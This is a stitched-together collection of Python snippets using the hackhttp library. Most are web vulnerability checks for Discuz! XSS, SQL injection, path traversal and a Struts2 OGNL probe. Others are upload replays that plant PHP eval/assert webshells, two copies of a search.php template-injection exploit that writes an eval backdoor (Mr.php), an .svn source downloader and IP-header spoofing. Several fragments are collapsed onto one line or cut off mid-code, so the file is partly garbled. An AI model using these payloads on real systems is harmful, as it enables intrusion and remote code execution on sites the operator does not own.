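def audit(args):
    """Probe a Discuz! site for a reflected ``javascript:`` URL in ``referer``.

    Two login endpoints receive the same marker URL in their ``referer``
    parameter. A page that echoes the marker back unencoded on a 200 is
    reported through ``security_info``; after the first hit the second
    endpoint is not tried, matching the original two-step check. The two
    copy-pasted request/compare sequences are folded into one loop.

    Args:
        args: base URL the payload paths are appended to verbatim (no path
              joining is done, so it is expected to end in ``/``).
    """
    marker = "javascript://www.discuz.net/testvul"
    payloads = (
        "member.php?mod=logging&action=login&referer=" + marker,
        "connect.php?receive=yes&mod=login&op=callback&referer=" + marker,
    )
    for payload in payloads:
        verify_url = args + payload
        code, head, res, errcode, _ = hackhttp().http(verify_url)
        # Only a 200 that reflects the marker verbatim counts; an escaped
        # copy or a redirect is not a finding.
        if code == 200 and marker in res:
            security_info(verify_url)
            return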
def upload(lists):
    """Replay a captured multipart upload against upload-labs Pass-17.

    ``lists`` is accepted only for signature compatibility and is never
    read. The request is a verbatim browser capture for host 127.0.0.1
    (cookie ``pass=17``) whose file part ``17.php`` holds a PHP ``assert``
    stub; only the response status code is printed.
    """
    client = hackhttp.hackhttp()
    # NOTE(review): Content-Length is copied from the capture. If the
    # library forwards it verbatim it must still match the body below.
    raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341

-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream

<?php assert($_POST["LandGrey"])?>
-----------------------------6696274297634
Content-Disposition: form-data; name="submit"

上传
-----------------------------6696274297634--
"""
    status, _, _, _, _ = client.http(
        'http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
    print(str(status) + "\r")
def upload(lists):
    """Replay a captured upload against upload-labs Pass-18 on 192.168.99.50.

    ``lists`` is unused. The file part is named ``18.php.7z`` and contains
    a ``phpinfo()`` stub; only the response status is printed. The
    ``submit`` field value is kept byte-for-byte from the capture — it
    looks like a Latin-1 rendering of the UTF-8 bytes of the button label
    seen in the Pass-17 sibling, so do not "fix" it without re-capturing.
    """
    client = hackhttp.hackhttp()
    # NOTE(review): Content-Length is copied from the capture; it has to
    # match the body unless the library recomputes it.
    raw = """POST /Pass-18/index.php HTTP/1.1
Host: 192.168.99.50
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://192.168.99.50/Pass-18/index.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------220322109030489
Content-Length: 334

-----------------------------220322109030489
Content-Disposition: form-data; name="upload_file"; filename="18.php.7z"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------220322109030489
Content-Disposition: form-data; name="submit"

ä¸ä¼
-----------------------------220322109030489--
"""
    status, _, _, _, _ = client.http(
        'http://192.168.99.50/Pass-18/index.php', raw=raw)
    print(str(status) + "\r")
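def upupup(target, r_url, raw_data):
    """Send a raw upload request and return the webshell URL it reports.

    ``TARGET_IP`` in ``r_url`` is replaced by ``target`` before sending.
    On HTTP 404 the upload page is taken to be gone: ``usual_get`` is
    called, the function sleeps five seconds and returns ``''``. Otherwise
    the first ``http://...php`` URL found in the logged response is
    returned.

    Fixes: the original indexed ``findall(...)[0]`` blindly, so a response
    without a shell URL raised ``IndexError`` and was reported as a
    generic error; it also printed ``req.throw_exception`` inside the
    handler, where ``req`` may not even be bound yet. Both paths now
    return ``''`` with a clear message.
    """
    try:
        print "进入upupup()"
        r_url = r_url.replace('TARGET_IP', target)
        req = hackhttp.hackhttp()
        code, head, body, redirect, log = req.http(url=r_url, raw=raw_data)
        if code == 404:
            print target, code, r_url, ":上传页面被删除,常规循环上传等待目标重置环境"
            usual_get(target)
            time.sleep(5)
            print "跳出upupup():404"
            return ''
        # Greedy match: everything from "http://" up to the last ".php" on
        # the line, which is what the original relied on.
        shells = re.findall(r'http://.+\.php', log['response'])
        if not shells:
            print "跳出upupup():no shell url", target
            return ''
        print "跳出upupup():find_all", shells[0]
        return shells[0]
    except Exception as e:
        print target, "err from upupup", e
        print "跳出upupup():err", target
        return ''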
def check_vuln(self, arg):
    """Probe ``arg`` for OGNL injection through a multipart file name.

    The uploaded file name carries an XWork/Struts2 OGNL expression whose
    only side effect is adding a response header ``X-Test-<random>: bey0nd``
    (this looks like the well-known S2-046 check — confirm). ``arg`` is
    used as the request URL and its path component fills the request line.

    Returns:
        True when the marker header is reflected, otherwise False.
    """
    curl = hackhttp.hackhttp()
    uri = urlparse.urlparse(arg).path
    # Random suffix so a cached or static response cannot match the marker.
    randint1 = random.randint(1000, 10000)
    # NOTE(review): Content-Length 171 is shorter than the body below, and
    # the body length also varies with the 4- or 5-digit random suffix, so
    # this only works if the library recomputes the header. No Host header
    # is given either; presumably the library derives it from ``arg``.
    # ``\x00`` is a literal NUL byte (not a raw string); ``{{``/``}}`` are
    # escapes for ``str.format``.
    raw = """POST {uri} HTTP/1.1
Accept-Encoding: identity
Content-Length: 171
Cookie: access_token=a049bd87-d8c6-4756-aa6a-46a357a8de36;
Content-Type: multipart/form-data; boundary=1c88e9afa73c438d93b5043a7096b207
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

--1c88e9afa73c438d93b5043a7096b207
Content-Disposition: form-data; name="image1"; filename="%{{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test-{randint1}','bey0nd')}}'\x00b"
Content-Type: text/plain

--1c88e9afa73c438d93b5043a7096b207--
""".format(uri=uri, randint1=str(randint1))
    code, head, html, redir, log = curl.http(arg, raw=raw)
    # print head
    # code 0 appears to be the library's "request failed" value.
    if code != 0 and "X-Test-%s" % str(randint1) in head:
        return True
    else:
        return False
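def upload(value):
    """Replay a captured upload against upload-labs Pass-18 on afei123.com:8020.

    ``value`` is unused. The uploaded ``x.php`` writes ``shell.php`` on
    the target when executed. Fix: the original PHP payload nested an
    unescaped single-quoted ``'afei'`` inside a single-quoted string
    (``'<?php @eval($_POST['afei']);?>'``), which is a PHP parse error, so
    the dropped file could never have run; the inner quotes are now double
    quotes (same length, so Content-Length is unaffected). Only the status
    code is printed.
    """
    h = hackhttp.hackhttp()
    # NOTE(review): Content-Length is copied from the capture; it must
    # match the body unless the library recomputes it.
    data = '''POST /Pass-18/index.php?action=show_code HTTP/1.1
Host: afei123.com:8020
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36444535571657258037124113983
Content-Length: 383
Origin: http://afei123.com:8020
Connection: close
Referer: http://afei123.com:8020/Pass-18/index.php?action=show_code
Upgrade-Insecure-Requests: 1

-----------------------------36444535571657258037124113983
Content-Disposition: form-data; name="upload_file"; filename="x.php"
Content-Type: application/octet-stream

<?php fputs(fopen('shell.php', 'w'), '<?php @eval($_POST["afei"]);?>');?>
-----------------------------36444535571657258037124113983
Content-Disposition: form-data; name="submit"

submit
-----------------------------36444535571657258037124113983--
'''
    code, head, html, redirect_url, log = h.http(
        "http://afei123.com:8020/Pass-18/index.php", raw=data)
    print(code)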
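def vlun(url, datefile):
    """Check ``url`` for an exposed web.xml, .git config or svn entry.

    The body of a 200 response is searched for ``</web-app>``,
    ``repositoryformatversion`` or ``svn://``. A hit is logged as ``[*]``
    and the URL is appended to ``datefile``; a 200 without a marker logs
    ``[ ]``; any other status logs ``[-]``. Request and file errors are
    logged at debug level instead of being swallowed — the original used
    two bare ``except: pass`` clauses, which also ate KeyboardInterrupt.
    """
    markers = ("</web-app>", 'repositoryformatversion', 'svn://')
    headers = {
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
    }
    try:
        hh = hackhttp.hackhttp()
        # location=False: do not follow redirects, a 30x is not a finding.
        code, _, body, _, _ = hh.http(url=url, headers=headers, location=False,
                                      throw_exception=False, method='GET')
    except Exception as e:
        logging.debug("[!] %s request failed: %s", url, e)
        return
    if code != 200:
        logging.warning("[-] %s" % url)
        return
    if not any(marker in body for marker in markers):
        logging.warning("[ ] {}".format(url))
        return
    logging.warning("[*] {}".format(url))
    try:
        with open(datefile, 'a') as f:
            f.write(str(url) + '\n')
    except (IOError, OSError) as e:
        # Best effort, as before: a write failure must not stop the scan.
        logging.debug("[!] could not record %s in %s: %s", url, datefile, e)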
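def GetFile(domain, Filename, sha1):
    """Download one pristine blob from an exposed ``.svn`` directory.

    Fetches ``<domain>/.svn/pristine/<aa>/<sha1>.svn-base`` (``aa`` is the
    first two characters of ``sha1``) and writes the response body to
    ``Filename``, regardless of status code, as before.

    Fixes: the file is opened in binary mode inside a ``with`` block. The
    original used text mode and never closed the handle, which alters
    binary blobs on Windows and leaks descriptors over many calls.

    NOTE(review): ``Filename`` is used exactly as given. If it is derived
    from the remote repository's own metadata, the caller must reject
    ``..`` segments and absolute paths, or a hostile repository can write
    outside the output directory.
    """
    hh = hackhttp.hackhttp()
    sha = str(sha1)
    url = domain + "/.svn/pristine/" + sha[0:2] + "/" + sha + ".svn-base"
    _, _, body, _, _ = hh.http(url)
    with open(Filename, "wb") as fp:
        fp.write(body)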
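def __init__(self, url):
    """Bind the target URL and build the shared HTTP and thread-pool state.

    Creates a ``requests`` session, a pooled ``hackhttp`` client and a
    500-worker thread pool. The default header set carries a spoofed
    client address for targets that trust it for access decisions. Fix:
    the original spelled the header ``X-Forwarder-For``, which is not the
    standard ``X-Forwarded-For`` name, so the spoofed value would not be
    read by the target; the stray ``headers_dict`` alias is dropped.
    """
    self.url = url
    self.sess = requests.session()
    self.hh = hackhttp.hackhttp(hackhttp.httpconpool())
    self.tp = thread_pool.ThreadPool(500)
    self.headers = {
        'X-Forwarded-For': '192.168.1.1',
    }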
def audit(arg):
    """Error-based SQL injection check on ``batch.common.php``.

    The ``name`` parameter carries a duplicate-key subquery that makes
    MySQL raise an error containing ``md5(160341893519135)`` wrapped in
    ``:ich:``/``:kou:`` (the ``CHAR(...)`` sequences). A 200 response that
    contains the expected digest is reported via ``security_hole``.
    """
    marker = "3c6b20b60b3f57247420047ab16d3d71"
    target = arg + (
        'batch.common.php?action=modelquote&cid=1&name=spacecomments,'
        '(SELECT%203284%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,105,99,104,58),'
        '(MID((IFNULL(CAST(md5(160341893519135)%20AS%20CHAR),CHAR(32))),1,50)),'
        'CHAR(58,107,111,117,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables'
        '%20GROUP%20BY%20x)a)'
    )
    status, _, res, _, _ = hackhttp().http(target)
    if status != 200:
        return
    if marker in res:
        security_hole(target)
def __init__(self, httpTarget, payloadsQueue, raw, orgData, result, payloadLenght):
    """Set up a worker thread that consumes payloads from a shared queue.

    Stores the target, the queue, the raw request template, the original
    request data, the shared ``result`` list and the payload length, and
    creates a pooled ``hackhttp`` client (500 connections). Note the
    ``payloadLenght`` spelling is part of the public signature.
    """
    threading.Thread.__init__(self)
    self.httpTarget = httpTarget
    self.raw = raw
    self.orgData = orgData
    self.length = payloadLenght
    self._queue = payloadsQueue
    self.results = result
    self.hh = hackhttp.hackhttp(hackhttp.httpconpool(500))
def createM():
    """Request a DaoCloud sandbox node and pull its credentials from the reply.

    ``raw`` is not defined in this function; it must be a module-level
    raw request. When the JSON body carries ``sandbox_password`` the node's
    IP and password are extracted. NOTE(review): the whole response body,
    password included, is printed to stdout first — avoid running this
    where stdout is captured to logs. ``username`` is a redacted
    placeholder in this copy.
    """
    hh = hackhttp.hackhttp()
    code, head, html, redirect, log = hh.http(
        'http://api.daocloud.io/v1/single_runtime/nodes', raw=raw)
    print html
    if "sandbox_password" in html:
        # Raises KeyError if the expected 'node' layout is absent.
        r_j = json.loads(html)
        ip = r_j['node']['sandbox_ip_address']
        username = '******'
        passwd = r_j['node']['sandbox_password']
def tomcat(raw):
    """Print the titles of CNVD entries listed on the first result page.

    ``raw`` is a prepared raw HTTP request (the search form; whatever
    product filter it carries lives in the caller's capture) replayed
    against the CNVD flaw list. The first ``<tbody>`` of the page is
    re-parsed and the ``title`` attribute of every ``/flaw/show/CNVD-...``
    link is printed.
    """
    client = hackhttp.hackhttp()
    _, _, page, _, _ = client.http(
        url='http://www.cnvd.org.cn/flaw/list.htm?flag=true', raw=raw)
    table = BS(page, 'lxml').tbody
    links = BS(str(table), 'lxml').find_all(
        name='a', attrs={'href': re.compile('/flaw/show/CNVD-.*?')})
    for link in links:
        print(link['title'])
def apache(self, raw):
    """Print the titles of CNVD entries on the first result page.

    Same flow as ``tomcat``: replay ``raw`` against the CNVD flaw list,
    take the first ``<tbody>``, and print the ``title`` of every link
    whose ``href`` contains ``CNVD``.
    """
    client = hackhttp.hackhttp()
    _, _, page, _, _ = client.http(
        'http://www.cnvd.org.cn/flaw/list.htm?flag=true', raw=raw)
    table = BS(page, 'lxml').tbody
    entries = BS(str(table), 'lxml').find_all(
        'a', attrs={'href': re.compile('CNVD')})
    for entry in entries:
        print(entry['title'])
def audit(arg):
    """Check six Discuz! entry points for reflected XSS via ``handlekey``.

    Each page gets ``handlekey=123);alert(/xss/);//`` appended; a 200 that
    echoes ``alert(/xss/);//`` unencoded is reported via
    ``security_warning``. Every page is tried, hits are not deduplicated.
    """
    suffix = ');alert(/xss/);//'
    pages = [
        'admincp.php?infloat=yes&handlekey=123',
        'ajax.php?infloat=yes&handlekey=123',
        'announcement.php?infloat=yes&handlekey=123',
        'attachment.php?infloat=yes&handlekey=123',
        'member.php?infloat=yes&handlekey=123',
        'post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=123',
    ]
    marker = 'alert(/xss/);//'
    for page in pages:
        url = arg + page + suffix
        status, _, res, _, _ = hackhttp().http(url)
        if status != 200:
            continue
        if marker in res:
            security_warning(url)
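def get_header(url):
    """Fetch ``url`` and return the raw logged response text, or ``False``.

    A bare host is prefixed with ``http://``. The logged response is
    decoded as UTF-8 with invalid bytes dropped and re-encoded, so the
    returned ``str`` is always valid UTF-8. Returns ``False`` when the
    library produced no log or the request failed. Fix: the original bare
    ``except`` also hid KeyboardInterrupt/SystemExit and the failure
    reason; exceptions are now narrowed to ``Exception`` and printed.
    """
    try:
        print "Get http header:", url
        if not url.startswith("http"):
            url = "http://" + url
        hh = hackhttp.hackhttp()
        code, head, body, redirect, log = hh.http(url, headers=requests_headers())
        print "Get header ok:", url
        if log:
            return log['response'].decode('utf-8', 'ignore').encode('utf-8')
        return False
    except Exception as e:
        print "Get header failed:", url, e
        return False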
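def audit(arg):
    """Check Discuz X3.0 helper scripts for a full-path disclosure.

    Each path is requested directly; a 200 whose body contains a PHP
    warning of the form ``in <b>/abs/path</b> on line`` is reported via
    ``security_info``. Fix: the original unpacked the response as
    ``code, body, res, ...`` and ran the regex over ``body``, which in the
    library's ``(code, head, html, redirect, log)`` order is the header
    block, not the page — the warning text lives in the body (``res``),
    which is what the sibling checks search. The regex is compiled once.
    """
    wordlist = [
        'api/addons/zendcheck.php',
        'api/addons/zendcheck52.php',
        'api/addons/zendcheck53.php',
        'source/plugin/mobile/api/1/index.php',
        'source/plugin/mobile/extends/module/dz_digest.php',
        'source/plugin/mobile/extends/module/dz_newpic.php',
        'source/plugin/mobile/extends/module/dz_newreply.php',
        'source/plugin/mobile/extends/module/dz_newthread.php',
    ]
    pathinfo = re.compile(r' in <b>(.*)</b> on line')
    for payload in wordlist:
        verify_url = arg + payload
        code, head, res, errcode, _ = hackhttp().http(verify_url)
        if code == 200 and pathinfo.findall(res):
            security_info('Discuz X3.0 full Path Disclosure Vulnerability', verify_url)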
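def run(self):
    """Worker loop: pull URLs off the shared queue and record the live ones.

    Each URL answering HTTP 200 is echoed to stdout (red, with the banner)
    and appended to ``result.html`` as an anchor. Fixes: the queue is
    drained with a non-blocking ``get`` so two workers racing on
    ``empty()`` cannot hang on a blocking ``get``; the URL is HTML-escaped
    before being written into the anchor, since a scanned URL containing
    ``"`` or ``<`` would otherwise break or inject markup into the report
    when it is opened in a browser; and failures print the exception
    instead of a bare ``"error"``.
    """
    while True:
        try:
            urls = self._queue.get(block=False)
        except Exception:  # queue.Empty: another worker drained it
            break
        try:
            http = hackhttp.hackhttp()
            code, head, html, redirect_url, log = http.http(urls)
            if code == 200:
                print(u" Biu biu biu ▄︻┻┳══━一 " + "\033[1;31;40m" + urls)
                safe = (urls.replace('&', '&amp;').replace('<', '&lt;')
                            .replace('>', '&gt;').replace('"', '&quot;'))
                with open('result.html', 'a+') as f:
                    f.write('<a href="' + safe + '" target="_blank">' + safe + '</a>')
                    f.write('\r\n</br>')
        except Exception as e:
            print("error: %s %s" % (urls, e))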
def exploit(url):
    """POST a template-tag payload to ``<url>/search.php``.

    The ``searchword`` value chains ``{searchpage:...}`` tags so the
    server-side template assembles ``fwrite(fopen('Mr.php','w'), ...)``
    from the ``9[]`` parameters, writing ``Mr.php`` (an ``eval`` stub)
    next to ``search.php``. Nothing is printed on success; any exception
    from the request is reported and swallowed.

    NOTE(review): ``Content-Length: 22`` is far shorter than the body, and
    ``Host`` is filled with ``url`` as given (scheme included if the
    caller passes one). This only works if the library recomputes the
    length and normalises Host — confirm before relying on it.
    """
    Url = url + "/search.php"
    print "[*]Exploit Url:" + url
    raw = '''POST /search.php HTTP/1.1
Host: %s
Proxy-Connection: keep-alive
Content-Length: 22
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: %s
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>');
''' % (url, Url)
    hh = hackhttp.hackhttp()
    try:
        # Response is discarded; success is not verified here.
        a, b, c, d, e = hh.http(url=Url, raw=raw)
    except:
        print "[-]SomeError Happened!"
def exploit(url):
    """POST a template-tag payload to ``<url>/search.php``.

    Duplicate of the sibling ``exploit``: the ``searchword`` value chains
    ``{searchpage:...}`` tags so the server-side template assembles
    ``fwrite(fopen('Mr.php','w'), ...)`` from the ``9[]`` parameters and
    writes ``Mr.php`` (an ``eval`` stub) next to ``search.php``. Nothing
    is printed on success; request exceptions are reported and swallowed.

    NOTE(review): ``Content-Length: 22`` is far shorter than the body, and
    ``Host`` receives ``url`` as given (scheme included if present). This
    only works if the library recomputes the length and normalises Host —
    confirm before relying on it.
    """
    Url = url + "/search.php"
    print "[*]Exploit Url:"+url
    raw = '''POST /search.php HTTP/1.1
Host: %s
Proxy-Connection: keep-alive
Content-Length: 22
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: %s
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>');
'''%(url,Url)
    hh = hackhttp.hackhttp()
    try:
        # Response is discarded; success is not verified here.
        a,b,c,d,e = hh.http(url = Url ,raw = raw)
    except:
        print "[-]SomeError Happened!"
from common import * else: from common2 import * import common2 as common import util import DNS import threadpool from functools import partial from fingerprint import FingerPrint from dnslog import DNSLog import hackhttp import hackhttp as hh hackhttp = hh.hackhttp() fingerprint = FingerPrint() _G = { 'scanport': False, 'subdomain': False, 'target': 'www.abc.com', 'disallow_ip': ['127.0.0.1'], 'kv': {}, 'udomain': "test", # 'user_dict':'http://192.168.0.158/1.txt' # 'pass_dict':'http://192.168.0.158/1.txt' "custom_dict": {} }
def __init__(self, args):
    """Keep the parsed CLI ``args`` and create empty scan state.

    Initialises an empty payload list, an empty payload ``Queue``, a
    ``hackhttp`` client and an empty result list.
    """
    self.args = args
    self.hh = hackhttp.hackhttp()
    self.payloadsQueue = Queue()
    self.result = []
    self.payloads = []
#!/usr/bin/env python # coding:utf-8 from thread_pool import ThreadPool import hackhttp import re import os hh = hackhttp.hackhttp(hackhttp.httpconpool(500)) tp = ThreadPool(500) package = "wooyun" if not os.path.exists(package): os.mkdir(package) def vlun(wid): print "[+]%s" % wid if os.path.isfile(wid + ".html"): return _, _, html, _, _ = hh.http( url="http://wooyun.org/bugs/%s" % wid, cookcookie=False) open(package + "/" + wid + '.html', 'wb').write(html) def catalog(page): _, _, html, _, _ = hh.http( url="http://wooyun.org/bugs/new_public/page/%d" % page, cookcookie=False) for wid in re.findall(r'href="/bugs/(wooyun-\d+-\d+)">', html): tp.add_task(vlun, wid) if page > 0:
# -*- coding:utf8 -*-
from hackhttp import hackhttp
import base64

# CTF-style solver: the flag arrives double-base64-encoded in a response
# header named ``flag`` (as ``<label>: <value>``); the decoded value is
# then POSTed back as ``margin`` using the fixed PHPSESSID cookie.
url = 'http://120.24.86.145:8002/web6/'
h = hackhttp(cookie_str='PHPSESSID=nsgvo07u0req808u0orteq1hvdsnttgf;')

_, head, _, _, _ = h.http(url)
outer = base64.b64decode(head['flag'])
flag = base64.b64decode(outer.split(': ')[1])
print(flag)

_, _, html, _, _ = h.http(url, post='margin=' + flag)
print(html)
def audit(args):
    """Check Discuz! ``admincp.php`` for reflected XSS via ``handlekey``.

    The marker ``);alert(/testvul/);//`` is injected through ``handlekey``
    and the response is searched for the exact inline-script fragment the
    page builds around it. A match on a 200 is reported via
    ``security_info``.
    """
    marker = "if($('return_123);alert(/testvul/);//'"
    verify_url = args + "/admincp.php?infloat=yes&handlekey=123);alert(/testvul/);//"
    status, _, content, _, _ = hackhttp().http(verify_url)
    if status != 200:
        return
    if marker in content:
        security_info(verify_url)
def audit(arg):
    """Check the Discuz! ``milu_seotool`` plugin for path traversal.

    ``myac=../../robots.txt%00`` asks the sitemap action to read a file
    two directories up with a NUL terminator; a 200 whose body contains
    ``User-agent`` means the site's robots.txt was read and is reported via
    ``security_hole``.
    """
    url = arg + 'plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00'
    status, _, res, _, _ = hackhttp().http(url)
    if status != 200:
        return
    if "User-agent" in res:
        security_hole(url)
def audit(args):
    """Error-based SQL injection check on the ``nds_up_ques`` plugin.

    ``orderby`` carries an ``updatexml(...)`` expression that makes MySQL
    raise an error containing ``MD5(1)``. The response is searched for
    the first 31 characters of that digest (presumably because the error
    text is truncated with the leading quote included); a hit on a 200
    is reported via ``security_hole``.
    """
    marker = "c4ca4238a0b923820dcc509a6f75849"
    verify_url = args + (
        "plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1"
        "&orderby=dateline%20and%201=(updatexml(1,concat(0x27,MD5(1)),1))--"
    )
    status, _, res, _, _ = hackhttp().http(verify_url)
    if status != 200:
        return
    if marker in res:
        security_hole(verify_url)
#!/usr/bin/env python # -*- coding: utf-8 -*- Bugscan = 'https://www.bugscan.net/' from common import * import util from functools import partial from fingerprint import FingerPrint import hackhttp hackhttp = hackhttp.hackhttp() fingerprint = FingerPrint() _G = { 'scanport': False, 'subdomain': False, 'target': 'www.abc.com', 'disallow_ip': ['127.0.0.1'], 'kv': {}, #'user_dict':'http://192.168.0.158/1.txt' #'pass_dict':'http://192.168.0.158/1.txt' } util._G = _G def debug(fmt, *args): print(fmt % args) LEVEL_NOTE = 0 LEVEL_INFO = 1 LEVEL_WARNING = 2
#!/usr/bin/env python
# coding:utf-8
# Minimal raw-request example: replay a captured form POST against
# httpbin.org and print the request the library actually sent.
import hackhttp
hh = hackhttp.hackhttp()
# Content-Length 19 matches the body "key1=val1&key2=val2" exactly.
raw = '''POST /post HTTP/1.1
Host: httpbin.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

key1=val1&key2=val2'''
code, head, html, redirect, log = hh.http('http://httpbin.org/post', raw=raw)
# log['request'] is the wire-level request text recorded by the library.
print log['request']
# /usr/bin/python # -*-coding:utf-8-*- import re try: from hackhttp import hackhttp except: os.system("pip install hackhttp") try: import argparse except: os.system("pip install argparse") test = hackhttp() def login(): raw = """POST / HTTP/1.1 Host: admin.dnslog.link User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://admin.dnslog.link/ Cookie: csrftoken=A9y9Ecab1GlfQJKaJscqokzPUyD5hWII Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------936596724326007758981605209 Content-Length: 469 -----------------------------936596724326007758981605209 Content-Disposition: form-data; name="username"
#!/usr/bin/env python # -*- coding: utf-8 -*- Bugscan='https://www.bugscan.net/' from common import * import util from functools import partial from fingerprint import FingerPrint import hackhttp import miniCurl import requests as req from pocscanui.settings import SAVE_RESULT_API curl = miniCurl.Curl() hackhttp=hackhttp.hackhttp() fingerprint=FingerPrint() _G = { 'scanport':False, 'subdomain': False, 'target': 'www.abc.com', 'disallow_ip':['127.0.0.1'], 'kv' : {}, #'user_dict':'http://192.168.0.158/1.txt' #'pass_dict':'http://192.168.0.158/1.txt' } util._G = _G def debug(fmt, *args): print(fmt % args)
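import hackhttp

# Fire one GET at each DGA domain listed in dga.txt (tab-separated, domain
# in the second column). Responses are ignored; this is only a "touch".
hh = hackhttp.hackhttp()
with open('dga.txt') as f:
    # The original called f.readlines(100): that argument is a *byte*
    # size hint, not a line count, and CPython 2 rounds it up to a buffer
    # size, so the number of entries seen was platform-dependent. Read
    # everything and take the first 100 lines explicitly — presumably the
    # intended sample; adjust if a different size was meant.
    dgas = f.readlines()[:100]

# Skip the first 18 entries, as before.
for dga in dgas[18:]:
    fields = dga.rstrip('\r\n').split('\t')
    if len(fields) < 2:
        # Malformed line; the original raised IndexError here.
        continue
    url = 'http://' + fields[1]
    print(url)
    try:
        hh.http(url)
    except Exception:
        # Best effort: unreachable domains are expected and ignored.
        pass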
# -*- coding:utf-8 -*- # author:flystart # home:www.flystart.org import sys import traceback import hackhttp import urlparse import time import chardet # from requests.adapters import HTTPAdapter from lib.core.datatype import AttribDict from lib.core.data import conf, logger from lib.core.common import q_str_to_dict, dict_to_q_str, format_hex, format_unicode, url_encode, get_file_contents # requests.adapters.DEFAULT_RETRIES = 5 fly_req = hackhttp.hackhttp() # fly_req.mount('http://', HTTPAdapter(max_retries=3)) # fly_req.mount('https://', HTTPAdapter(max_retries=3)) class Request: def __init__(self, headers, proxies={}, timeout=3, method='get'): if proxies: host, port = proxies.values()[0].split(":") proxies = (host, int(port)) if conf.raw: self.raw_request = get_file_contents(conf.raw) self.headers = headers self.proxies = proxies self.timeout = timeout self.method = method
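def spider(self, data):
    """Replay the module-level ``raw`` request against seebug.org and print
    the status code.

    Fix: the original called the client object itself
    (``hh(url=..., raw=...)``), which is not how the library is used
    anywhere else in this code base (``hh.http(...)``) and would fail at
    call time; the call now goes through ``.http``. ``data`` is still
    unused and ``raw`` still comes from module scope — presumably ``data``
    was meant to be the raw request; confirm with the caller before
    wiring it through.
    """
    hh = hackhttp.hackhttp()
    code, head, html, redirect, log = hh.http(url='https://www.seebug.org', raw=raw)
    print(code)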
